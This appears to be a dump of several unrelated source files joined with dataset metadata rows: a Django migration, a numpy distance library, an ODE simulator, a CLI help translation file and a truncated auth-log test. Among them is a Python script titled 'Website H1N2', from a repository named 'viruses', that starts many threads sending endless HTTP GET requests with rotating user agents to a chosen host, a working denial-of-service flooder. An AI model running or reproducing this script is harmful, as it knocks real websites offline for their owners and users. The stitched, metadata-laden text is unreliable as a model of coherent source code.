__all__ = ['dp'] | 31.333333 | 46 | 0.851064 | 22 | 188 | 6.909091 | 0.409091 | 0.342105 | 0.236842 | 0.414474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101064 | 188 | 6 | 47 | 31.333333 | 0.899408 | 0 | 0 | 0 | 0 | 0 | 0.010582 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.8 | 0 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
1e9555e017ba7ff0809db2f7b4ef9991b9999cc5 | 2,649 | py | Python | Python/httpv.py | johnmelodyme/viruses | c8c4b628a6ae725a45312b4365fa8a6876509706 | [
"BSD-2-Clause"
] | 4 | 2018-11-15T08:23:06.000Z | 2019-04-29T13:30:44.000Z | Python/httpv.py | johnmelodyme/Viruses | c8c4b628a6ae725a45312b4365fa8a6876509706 | [
"BSD-2-Clause"
] | null | null | null | Python/httpv.py | johnmelodyme/Viruses | c8c4b628a6ae725a45312b4365fa8a6876509706 | [
"BSD-2-Clause"
] | 2 | 2019-02-13T19:53:26.000Z | 2021-05-30T19:04:43.000Z | import threading
import requests
import sys
import random
print '''########################################
############## Website H1N2 ##########
############## by John Melody #########
###############################'''
host = raw_input("Url/ip:")
thread_num = input("threads:")
user_agent = [
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1"
"Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24",
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24"
]
def run():
if len(sys.argv)>=1:
url="http://"+host
print "Attacking",host
while True:
headers={'User-Agent': random.choice(user_agent)}
r = requests.get(url,headers=headers)
else:
print "It only work on HTTP server!!!"
for i in range(thread_num):
th = threading.Thread(target = run)
th.start() | 57.586957 | 122 | 0.650057 | 465 | 2,649 | 3.683871 | 0.215054 | 0.084063 | 0.094571 | 0.210158 | 0.748395 | 0.747227 | 0.7338 | 0.708698 | 0.654991 | 0.55108 | 0 | 0.178887 | 0.145338 | 2,649 | 46 | 123 | 57.586957 | 0.577739 | 0 | 0 | 0 | 0 | 0.428571 | 0.798464 | 0.027255 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.095238 | null | null | 0.071429 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1ecf8b30782b6a52d6d51ab78460e3504bce895b | 8,198 | py | Python | trendapp/migrations/0001_initial.py | Madjura/klang-thesis | 33c1cfe707faede34dad8719c4c018c8354a8d9e | [
"MIT"
] | null | null | null | trendapp/migrations/0001_initial.py | Madjura/klang-thesis | 33c1cfe707faede34dad8719c4c018c8354a8d9e | [
"MIT"
] | null | null | null | trendapp/migrations/0001_initial.py | Madjura/klang-thesis | 33c1cfe707faede34dad8719c4c018c8354a8d9e | [
"MIT"
] | null | null | null | # Generated by Django 3.0.2 on 2020-09-28 16:05
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Feed',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('channel_title', models.TextField(null=True)),
('channel_link', models.TextField(null=True)),
('channel_description', models.TextField(null=True)),
('channel_language', models.CharField(max_length=20, null=True)),
('channel_lastBuildDate', models.DateTimeField(null=True)),
('item_title', models.TextField(null=True)),
('item_link', models.TextField(null=True)),
('item_description', models.TextField(null=True)),
('item_pubDate', models.DateTimeField(null=True)),
('item_guid', models.TextField(null=True, unique=True)),
('topic', models.TextField(null=True)),
('item_webpage', models.TextField(null=True)),
],
),
migrations.CreateModel(
name='StoreUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user_id', models.IntegerField(null=True, unique=True)),
('name', models.TextField(null=True)),
('screen_name', models.TextField(null=True)),
('location', models.TextField(null=True)),
('description', models.TextField(null=True)),
('url', models.TextField(null=True)),
('protected', models.BooleanField(null=True)),
('followers_count', models.IntegerField(null=True)),
('friends_count', models.IntegerField(null=True)),
('listed_count', models.IntegerField(null=True)),
('created_at', models.DateTimeField(null=True)),
('favourites_count', models.IntegerField(null=True)),
('geo_enabled', models.BooleanField(null=True)),
('verified', models.BooleanField(null=True)),
('statuses_count', models.IntegerField(null=True)),
('lang', models.CharField(max_length=20, null=True)),
],
),
migrations.CreateModel(
name='Tweet',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tweet_id', models.IntegerField(unique=True)),
('created_at', models.DateTimeField(null=True)),
('text', models.TextField(null=True)),
('truncated', models.BooleanField(null=True)),
('source', models.TextField(null=True)),
('in_reply_to_status_id', models.IntegerField(null=True)),
('in_reply_to_user_id', models.IntegerField(null=True)),
('in_reply_to_screen_name', models.TextField(null=True)),
('retweet_count', models.IntegerField(null=True)),
('favorite_count', models.IntegerField(null=True)),
('lang', models.CharField(max_length=20, null=True)),
],
),
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user_id', models.IntegerField(null=True, unique=True)),
('name', models.TextField(null=True)),
('screen_name', models.TextField(null=True)),
('location', models.TextField(null=True)),
('description', models.TextField(null=True)),
('url', models.TextField(null=True)),
('protected', models.BooleanField(null=True)),
('followers_count', models.IntegerField(null=True)),
('friends_count', models.IntegerField(null=True)),
('listed_count', models.IntegerField(null=True)),
('created_at', models.DateTimeField(null=True)),
('favourites_count', models.IntegerField(null=True)),
('geo_enabled', models.BooleanField(null=True)),
('verified', models.BooleanField(null=True)),
('statuses_count', models.IntegerField(null=True)),
('lang', models.CharField(max_length=20, null=True)),
],
),
migrations.CreateModel(
name='TweetUrl',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('url', models.TextField(null=True)),
('expanded_url', models.TextField(null=True)),
('display_url', models.TextField(null=True)),
('beginning', models.IntegerField(null=True)),
('end', models.IntegerField(null=True)),
('tweet', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='trendapp.Tweet')),
],
),
migrations.AddField(
model_name='tweet',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='trendapp.User'),
),
migrations.CreateModel(
name='StoreTweet',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tweet_id', models.IntegerField(unique=True)),
('created_at', models.DateTimeField(null=True)),
('text', models.TextField(null=True)),
('truncated', models.BooleanField(null=True)),
('source', models.TextField(null=True)),
('in_reply_to_status_id', models.IntegerField(null=True)),
('in_reply_to_user_id', models.IntegerField(null=True)),
('in_reply_to_screen_name', models.TextField(null=True)),
('retweet_count', models.IntegerField(null=True)),
('favorite_count', models.IntegerField(null=True)),
('lang', models.CharField(max_length=20, null=True)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='trendapp.StoreUser')),
],
),
migrations.CreateModel(
name='Mention',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('beginning', models.IntegerField(null=True)),
('end', models.IntegerField(null=True)),
('screen_name', models.TextField(null=True)),
('name', models.TextField(null=True)),
('mention_id', models.IntegerField(null=True)),
('tweet', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='trendapp.Tweet')),
],
),
migrations.CreateModel(
name='Hashtag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('beginning', models.IntegerField(null=True)),
('end', models.IntegerField(null=True)),
('tag', models.TextField(default='')),
('tweet', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='trendapp.Tweet')),
],
),
migrations.CreateModel(
name='FeedContent',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.TextField()),
('content', models.TextField()),
('feed', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='trendapp.Feed')),
],
),
]
| 50.919255 | 114 | 0.559039 | 773 | 8,198 | 5.794308 | 0.135834 | 0.135745 | 0.127261 | 0.154052 | 0.8714 | 0.779192 | 0.773164 | 0.765573 | 0.758205 | 0.747712 | 0 | 0.004293 | 0.289705 | 8,198 | 160 | 115 | 51.2375 | 0.764898 | 0.005489 | 0 | 0.732026 | 1 | 0 | 0.128696 | 0.013373 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.013072 | 0 | 0.039216 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
44cc0bfb8ba53472205bea37798cdc7915a3e1ed | 4,550 | py | Python | pyckmeans/distance/c_interop.py | TankredO/pyckmeans | c8672b94cd75aadf6c4abc508f49107a4aedb86c | [
"MIT"
] | 9 | 2021-09-05T10:34:05.000Z | 2021-12-21T10:33:09.000Z | pyckmeans/distance/c_interop.py | TankredO/pyckmeans | c8672b94cd75aadf6c4abc508f49107a4aedb86c | [
"MIT"
] | null | null | null | pyckmeans/distance/c_interop.py | TankredO/pyckmeans | c8672b94cd75aadf6c4abc508f49107a4aedb86c | [
"MIT"
] | null | null | null | import ctypes
import pathlib
import numpy
# load the shared library
libfile = pathlib.Path(__file__).parent / 'lib' / 'distance.so'
lib = ctypes.CDLL(str(libfile))
# == p distance
lib.pDistance.restype = None
lib.pDistance.argtypes = [
numpy.ctypeslib.ndpointer( # alignment: n * m matrix
dtype=numpy.uint8,
ndim=2,
flags='C_CONTIGUOUS',
),
ctypes.c_int, # n: number of entries
ctypes.c_int, # m: number of sites
ctypes.c_int, # pairwiseDeletion
numpy.ctypeslib.ndpointer( # (output) distMat: n * n distance matrixmatrix
dtype=numpy.double,
ndim=2,
flags='C_CONTIGUOUS',
),
]
def p_distance(
alignment: numpy.ndarray,
pairwise_deletion: bool = True,
) -> numpy.ndarray:
'''p_distance
Calculate p-distance for a nucleotide alignment.
Parameters
----------
alignment : numpy.ndarray
n*m numpy alignment, where n is the number of entries and m is
the number of sites. Bases must be encoded in the format of
pyckmeans.io.NucleotideAlignment.
pairwise_deletion : bool, optional
Calculate distances with pairwise-deletion in case of missing
data, by default True
Returns
-------
numpy.ndarray
n*n distance matrix.
'''
if not alignment.flags['C_CONTIGUOUS']:
alignment = numpy.ascontiguousarray(alignment)
n, m = alignment.shape
dist_mat = numpy.zeros((n, n), dtype=numpy.double)
lib.pDistance(alignment, n, m, pairwise_deletion, dist_mat)
return dist_mat
# == Jukes-Cantor distance
lib.jcDistance.restype = None
lib.jcDistance.argtypes = [
numpy.ctypeslib.ndpointer( # alignment: n * m matrix
dtype=numpy.uint8,
ndim=2,
flags='C_CONTIGUOUS',
),
ctypes.c_int, # n: number of entries
ctypes.c_int, # m: number of sites
ctypes.c_int, # pairwiseDeletion
numpy.ctypeslib.ndpointer( # (output) distMat: n * n distance matrixmatrix
dtype=numpy.double,
ndim=2,
flags='C_CONTIGUOUS',
),
]
def jc_distance(
alignment: numpy.ndarray,
pairwise_deletion: bool = True,
) -> numpy.ndarray:
'''jc_distance
Calculate Jukes-Cantor distance for a nucleotide alignment.
Parameters
----------
alignment : numpy.ndarray
n*m numpy alignment, where n is the number of entries and m is
the number of sites. Bases must be encoded in the format of
pyckmeans.io.NucleotideAlignment.
pairwise_deletion : bool, optional
Calculate distances with pairwise-deletion in case of missing
data, by default True
Returns
-------
numpy.ndarray
n*n distance matrix.
'''
if not alignment.flags['C_CONTIGUOUS']:
alignment = numpy.ascontiguousarray(alignment)
n, m = alignment.shape
dist_mat = numpy.zeros((n, n), dtype=numpy.double)
lib.jcDistance(alignment, n, m, pairwise_deletion, dist_mat)
return dist_mat
# == Kimura 2-parameter distance
lib.k2pDistance.restype = None
lib.k2pDistance.argtypes = [
numpy.ctypeslib.ndpointer( # alignment: n * m matrix
dtype=numpy.uint8,
ndim=2,
flags='C_CONTIGUOUS',
),
ctypes.c_int, # n: number of entries
ctypes.c_int, # m: number of sites
ctypes.c_int, # pairwiseDeletion
numpy.ctypeslib.ndpointer( # (output) distMat: n * n distance matrixmatrix
dtype=numpy.double,
ndim=2,
flags='C_CONTIGUOUS',
),
]
def k2p_distance(
alignment: numpy.ndarray,
pairwise_deletion: bool = True,
) -> numpy.ndarray:
'''jc_distance
Calculate Kimura 2-parameter distance for a nucleotide alignment.
Parameters
----------
alignment : numpy.ndarray
n*m numpy alignment, where n is the number of entries and m is
the number of sites. Bases must be encoded in the format of
pyckmeans.io.NucleotideAlignment.
pairwise_deletion : bool, optional
Calculate distances with pairwise-deletion in case of missing
data, by default True
Returns
-------
numpy.ndarray
n*n distance matrix.
'''
if not alignment.flags['C_CONTIGUOUS']:
alignment = numpy.ascontiguousarray(alignment)
n, m = alignment.shape
dist_mat = numpy.zeros((n, n), dtype=numpy.double)
lib.k2pDistance(alignment, n, m, pairwise_deletion, dist_mat)
return dist_mat
| 27.575758 | 79 | 0.635385 | 545 | 4,550 | 5.220183 | 0.170642 | 0.008436 | 0.034798 | 0.023199 | 0.871705 | 0.871705 | 0.871705 | 0.871705 | 0.871705 | 0.871705 | 0 | 0.004502 | 0.267692 | 4,550 | 164 | 80 | 27.743902 | 0.84934 | 0.415604 | 0 | 0.759036 | 0 | 0 | 0.049959 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036145 | false | 0 | 0.036145 | 0 | 0.108434 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
78d684b2dfba8fea52e61767b0aac07646bb57a4 | 2,941 | py | Python | dyn_sim.py | whoiszyc/lfd_lqr | 219910262bc7ea3ac66feceb94d20620de4ff533 | [
"Apache-2.0"
] | null | null | null | dyn_sim.py | whoiszyc/lfd_lqr | 219910262bc7ea3ac66feceb94d20620de4ff533 | [
"Apache-2.0"
] | null | null | null | dyn_sim.py | whoiszyc/lfd_lqr | 219910262bc7ea3ac66feceb94d20620de4ff533 | [
"Apache-2.0"
] | null | null | null | import numpy as np
def dyn_sim_discrete_time(A, Bu, Bd, x0, u, d, t_series):
"""
Simulate discrete-time ODE
Args:
A: discrete-time A
Bu: discrete-time B for control
Bd: discrete-time B for disturbance
x0: Initial condition in numpy array nx*1
u: Control signal in numpy array, [[u]] if constrant
d: Disturbance signal in numpy array, [[d]] if constrant
t_series: Time series
Returns: Integration results in numpy array
"""
steps = len(t_series)
nx = x0.shape[0]
nu = u.shape[0]
nd = d.shape[0]
Xt = np.zeros((nx, steps))
Ut = np.zeros((nu, steps))
Dt = np.zeros((nd, steps))
if u.shape[1] == 1 and d.shape[1] == 1:
for ii in range(steps):
Xt[:, [ii]] = x0
Ut[:, [ii]] = u[:, [0]]
Dt[:, [ii]] = d[:, [0]]
x1 = A @ x0 + Bu @ u[:, [0]] + Bd @ d[:, [0]]
x0 = x1
elif u.shape[1] == 1 and d.shape[1] > 1:
for ii in range(steps):
Xt[:, [ii]] = x0
Ut[:, [ii]] = u[:, [0]]
Dt[:, [ii]] = d[:, [ii]]
x1 = A @ x0 + Bu @ u[:, [0]] + Bd @ d[:, [ii]]
x0 = x1
elif u.shape[1] > 1 and d.shape[1] == 1:
for ii in range(steps):
Xt[:, [ii]] = x0
Ut[:, [ii]] = u[:, [ii]]
Dt[:, [ii]] = d[:, [0]]
x1 = A @ x0 + Bu @ u[:, [ii]] + Bd @ d[:, [0]]
x0 = x1
elif u.shape[1] > 1 and d.shape[1] > 1:
for ii in range(steps):
Xt[:, [ii]] = x0
Ut[:, [ii]] = u[:, [ii]]
Dt[:, [ii]] = d[:, [ii]]
x1 = A @ x0 + Bu @ u[:, [ii]] + Bd @ d[:, [ii]]
x0 = x1
else:
print("Input dimensions do not match")
return Xt, Ut, Dt
def dyn_sim_feedback_discrete_time(A, Bu, Bd, x0, u, d, t_series, K):
"""
Simulate discrete-time ODE
Args:
A: discrete-time A
Bu: discrete-time B for control
Bd: discrete-time B for disturbance
x0: Initial condition in numpy array nx*1
u: Control signal in numpy array, [[u]] if constrant
d: Disturbance signal in numpy array, [[d]] if constrant
t_series: Time series
Returns: Integration results in numpy array
"""
steps = len(t_series)
nx = x0.shape[0]
nu = u.shape[0]
nd = d.shape[0]
Xt = np.zeros((nx, steps))
Ut = np.zeros((nu, steps))
Dt = np.zeros((nd, steps))
if d.shape[1] == 1:
for ii in range(steps):
Xt[:, [ii]] = x0
Ut[:, [ii]] = K @ x0
x1 = A @ x0 + Bu @ K @ x0 + Bd @ d[:, [0]]
x0 = x1
elif d.shape[1] > 1:
for ii in range(steps):
Xt[:, [ii]] = x0
Ut[:, [ii]] = K @ x0
x1 = A @ x0 + Bu @ K @ x0 + Bd @ d[:, [ii]]
x0 = x1
else:
print("Disturbance dimensions do not match")
return Xt, Ut, Dt
| 30.635417 | 69 | 0.455627 | 434 | 2,941 | 3.057604 | 0.140553 | 0.09043 | 0.052751 | 0.036172 | 0.956292 | 0.954785 | 0.948003 | 0.925396 | 0.868124 | 0.839488 | 0 | 0.041848 | 0.374362 | 2,941 | 95 | 70 | 30.957895 | 0.679348 | 0.248555 | 0 | 0.730159 | 0 | 0 | 0.030375 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.031746 | false | 0 | 0.015873 | 0 | 0.079365 | 0.031746 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
15333ce233d16c5570a1b8f689e5e17af45998aa | 7,650 | py | Python | src/hydratk/extensions/trackapps/translation/en/help.py | hydratk/hydratk-ext-trackapps | 0383b92d49fc1d911ce98414bcd13b48509aaf58 | [
"BSD-3-Clause"
] | null | null | null | src/hydratk/extensions/trackapps/translation/en/help.py | hydratk/hydratk-ext-trackapps | 0383b92d49fc1d911ce98414bcd13b48509aaf58 | [
"BSD-3-Clause"
] | null | null | null | src/hydratk/extensions/trackapps/translation/en/help.py | hydratk/hydratk-ext-trackapps | 0383b92d49fc1d911ce98414bcd13b48509aaf58 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""This code is a part of Hydra Toolkit
.. module:: hydratk.extensions.trackapps.translation.en.help
:platform: Unix
:synopsis: English language translation for TrackApps extension help generator
.. moduleauthor:: Petr Rašek <bowman@hydratk.org>
"""
language = {
'name': 'English',
'ISO-639-1': 'en'
}
''' TrackApps Commands '''
help_cmd = {
'track': 'run trackapps command line extension',
# standalone with option profile trackapps
'run': 'run trackapps command line extension'
}
''' TrackApps Options '''
help_opt = {
'tr-app': {'{h}--tr-app qc|bugzilla|mantis|trac|testlink{e}': {'description': 'application', 'commands': ('track')}},
'tr-action': {'{h}--tr-action read|create|update|delete{e}': {'description': 'action, delete supported for apps: qc|mantis|trac', 'commands': ('track')}},
'tr-type': {'[{h}--tr-type defect|test-folder|test|test-set-folder|test-set|test-instance|test-suite|test-plan|build{e}]': {'description': 'entity type, default defect, supported for actions: read|create|update|delete, apps: qc|testlink', 'commands': ('track')}},
'tr-input': {'[{h}--tr-input <filename>{e}]': {'description': 'filename, content is written to ticket description, supported for actions: create|update', 'commands': ('track')}},
'tr-output': {'[{h}--tr-output <filename>{e}]': {'description': 'filename, writes action output, supported for action: read', 'commands': ('track')}},
'tr-url': {'[{h}--tr-url <url>{e}]': {'description': 'url, configurable', 'commands': ('track')}},
'tr-user': {'[{h}--tr-user <username>{e}]': {'description': 'username, configurable', 'commands': ('track')}},
'tr-passw': {'[{h}--tr-passw <password>{e}]': {'description': 'password, configurable', 'commands': ('track')}},
'tr-dev-key': {'[{h}--tr-dev-key <key>{e}]': {'description': 'developer key, configurable, supported for app: testlink', 'commands': ('track')}},
'tr-domain': {'[{h}--tr-domain <domain>{e}]': {'description': 'domain, configurable, supported for app: qc', 'commands': ('track')}},
'tr-project': {'[{h}--tr-project <project>{e}]': {'description': 'project, configurable, supported for apps: qc|mantis|trac|jira|testlink', 'commands': ('track')}},
'tr-id': {'[{h}--tr-id <num>{e}]': {'description': 'record id, supported for actions: read|update|delete', 'commands': ('track')}},
'tr-fields': {'[{h}--tr-fields <list>{e}]': {'description': 'requested fields, name1,name2,... , supported for action: read', 'commands': ('track')}},
'tr-query': {'[{h}--tr-query <expression>{e}]': {'description': 'query, supported for action: read, apps: qc|bugzilla|trac|jira', 'commands': ('track')}},
'tr-order-by': {'[{h}--tr-order-by <expression>{e}]': {'description': 'record ordering, name1:direction,name2:direction,... , direction asc|desc, supported for action: read, app: qc', 'commands': ('track')}},
'tr-limit': {'[{h}--tr-limit <num>{e}]': {'description': 'limit, supported for action: read, apps: qc|bugzilla|jira', 'commands': ('track')}},
'tr-offset': {'[{h}--tr-offset <num>{e}]': {'description': 'offset, supported for action: read, apps: qc|bugzilla|jira', 'commands': ('track')}},
'tr-page': {'[{h}--tr-page <num>{e}]': {'description': 'record page, supported for action: read, app: mantis', 'commands': ('track')}},
'tr-per-page': {'[{h}--tr-per-page <num>{e}]': {'description': 'records per page, supported for action: read, app: mantis', 'commands': ('track')}},
'tr-params': {'[{h}--tr-params <dict>{e}]': {'description': 'record parameters, name1:value,name2:value,... , supported for actions: create|update', 'commands': ('track')}},
'tr-path': {'[{h}--tr-path <path>{e}]': {'description': 'directory path, dir1/dir2/... , supported for use cases: read/create folder|read/create test set|create test|read/create suite, apps: qc|testlink', 'commands': ('track')}},
'tr-steps': {'[{h}--tr-steps <list>{e}]': {'description': 'test steps delimited by |, step parameters use dictionary form, name1:value,name2:value,...|name1:value,name2:value,... , supported for action: create, app: testlink', 'commands': ('track')}},
# standalone with option profile trackapps
'app': {'{h}--app qc|bugzilla|mantis|trac|testlink{e}': {'description': 'application', 'commands': ('run')}},
'action': {'{h}--action read|create|update|delete{e}': {'description': 'action, delete supported for apps: qc|mantis|trac', 'commands': ('run')}},
'type': {'[{h}--type defect|test-folder|test|test-set-folder|test-set|test-instance|test-suite|test-plan|build{e}]': {'description': 'entity type, default defect, supported for actions: read|create|update|delete, apps: qc|testlink', 'commands': ('run')}},
'input': {'[{h}--input <filename>{e}]': {'description': 'filename, content is written to ticket description, supported for actions: create|update', 'commands': ('run')}},
'output': {'[{h}--output <filename>{e}]': {'description': 'filename, writes action output, supported for action: read', 'commands': ('run')}},
'url': {'[{h}--url <url>{e}]': {'description': 'url, configurable', 'commands': ('run')}},
'user': {'[{h}--user <username>{e}]': {'description': 'username, configurable', 'commands': ('run')}},
'passw': {'[{h}--passw <password>{e}]': {'description': 'password, configurable', 'commands': ('run')}},
'dev-key': {'[{h}--dev-key <key>{e}]': {'description': 'developer key, configurable, supported for app: testlink', 'commands': ('run')}},
'domain': {'[{h}--domain <domain>{e}]': {'description': 'domain, configurable, supported for app: qc', 'commands': ('run')}},
'project': {'[{h}--project <project>{e}]': {'description': 'project, configurable, supported for apps: qc|mantis|trac|jira|testlink', 'commands': ('run')}},
'id': {'[{h}--id <num>{e}]': {'description': 'record id, supported for actions: read|update|delete', 'commands': ('run')}},
'fields': {'[{h}--fields <list>{e}]': {'description': 'requested fields, name1,name2,... , supported for action: read', 'commands': ('run')}},
'query': {'[{h}--query <expression>{e}]': {'description': 'query, supported for action: read, apps: qc|bugzilla|trac|jira', 'commands': ('run')}},
'order-by': {'[{h}--order-by <expression>{e}]': {'description': 'record ordering, name1:direction,name2:direction,... , direction asc|desc, supported for action: read, app: qc', 'commands': ('run')}},
'limit': {'[{h}--limit <num>{e}]': {'description': 'limit, supported for action: read, apps: qc|bugzilla|jira', 'commands': ('run')}},
'offset': {'[{h}--offset <num>{e}]': {'description': 'offset, supported for action: read, apps: qc|bugzilla|jira', 'commands': ('run')}},
'page': {'[{h}--page <num>{e}]': {'description': 'record page, supported for action: read, app: mantis', 'commands': ('run')}},
'per-page': {'[{h}--per-page <num>{e}]': {'description': 'records per page, supported for action: read, app: mantis', 'commands': ('run')}},
'params': {'[{h}--params <dict>{e}]': {'description': 'record parameters, name1:value,name2:value,... , supported for actions: create|update', 'commands': ('run')}},
'path': {'[{h}--path <path>{e}]': {'description': 'directory path, dir1/dir2/... , supported for use cases: read/create folder|read/create test set|create test|read/create suite, apps: qc|testlink', 'commands': ('run')}},
'steps': {'[{h}--steps <list>{e}]': {'description': 'test steps delimited by |, step parameters use dictionary form, name1:value,name2:value,...|name1:value,name2:value,... , supported for action: create, app: testlink', 'commands': ('run')}}
}
| 104.794521 | 267 | 0.630327 | 934 | 7,650 | 5.1606 | 0.142398 | 0.109544 | 0.065353 | 0.073029 | 0.853527 | 0.821162 | 0.817012 | 0.752282 | 0.749378 | 0.748133 | 0 | 0.004291 | 0.116601 | 7,650 | 72 | 268 | 106.25 | 0.708938 | 0.046275 | 0 | 0 | 0 | 0.185185 | 0.778162 | 0.096199 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.037037 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
1576def32016c0a838589334b784163b2c0bf345 | 5,017 | py | Python | libtf/logparsers/tests/test_auth_log.py | ThreshingFloor/libtf | f1a8710f750639c9b9e2a468ece0d2923bf8c3df | [
"MIT"
] | null | null | null | libtf/logparsers/tests/test_auth_log.py | ThreshingFloor/libtf | f1a8710f750639c9b9e2a468ece0d2923bf8c3df | [
"MIT"
] | 4 | 2018-04-10T16:26:24.000Z | 2018-09-11T22:47:22.000Z | libtf/logparsers/tests/test_auth_log.py | ThreshingFloor/libtf | f1a8710f750639c9b9e2a468ece0d2923bf8c3df | [
"MIT"
] | null | null | null | from unittest import TestCase
from mock import mock
from ..tf_auth_log import TFAuthLog
class TestTFAuthLog(TestCase):
def setUp(self):
self.tf_auth_log = TFAuthLog([
'Feb 20 21:54:44 localhost sshd[3402]: Accepted publickey for john from 199.2.2.2 port 63673 ssh2: RSA 39:33:99:e9:a0:dc:f2:33:a3:e5:72:3b:7c:3a:56:84',
'Feb 21 00:13:35 localhost sshd[7483]: Accepted password for kat from 201.1.33.12 port 58803 ssh2',
